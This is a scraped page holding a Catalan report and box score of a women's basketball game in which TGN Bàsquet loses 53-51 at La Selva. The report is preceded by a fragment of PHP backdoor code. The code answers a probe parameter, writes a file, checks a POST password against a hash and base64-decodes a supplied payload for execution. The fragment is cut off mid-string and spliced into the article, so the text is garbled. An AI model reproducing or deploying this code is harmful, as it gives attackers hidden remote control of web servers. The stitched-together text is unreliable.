function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El sènior femení B fa un nefast segon període i perd a la pista de La Selva (53-51) - Tgn Bàsquet Club -

El sènior femení B fa un nefast segon període i perd a la pista de La Selva (53-51)

Updated: gener 20, 2015

El sènior femení B del TGN Bàsquet va perdre molt més que un partit a la pista de La Selva. El conjunt lila, amb aquesta derrota, perd gran part de les possibilitats de ser a la part alta de la classificació després de deixar escapar un partit que es va complicar molt abans del descans. La local Pintaluba va ser un malson per les visitants que van desaparèixer completament de la pista en el segon quart (20-4 de parcial). Amb tot, el TGN Bàsquet va voler reaccionar després del descans i, liderat per Vidal, va escurçar les diferències fins a només dos punts amb tot el quart període per jugar. Les faltes personals, però, van pesar massa i algunes males decisions en atac van impedir aconseguir la victòria.

CB LA SELVA   53

TGN BÀSQUET   51

CB LA SELVA: Pintaluba (17), Muntas J (6), Miñambres (8), Aguilar (8) i Olivé (4) – cinc inicial – Morales (2), Muntas L (6), Marti i Cañellas (2).

Triples 3: 2 Pintaluba i 1 Miñambres. 10/32 tirs lliures. 24 faltes. Eliminada Muntas min 38.

TGN BÀSQUET: Moreno (8), Altarejos (4), Cos (14), Rodríguez (2) i Vidal (16) -cinc inicial- Vallhonrat (4), López (1), Martínez, Gil, Masvidal (1) i Roig

(1). Triples 4: 2 Moreno i 1 Vidal i Vallhonrat. 13/23 tirs lliures. 26 faltes. Eliminades Altarejos min 37 i Vidal min 39.

Parcials 11-16, 20-4 (31-20) 10-19 i 12-12

Àrbitre: R, Vèrtiz.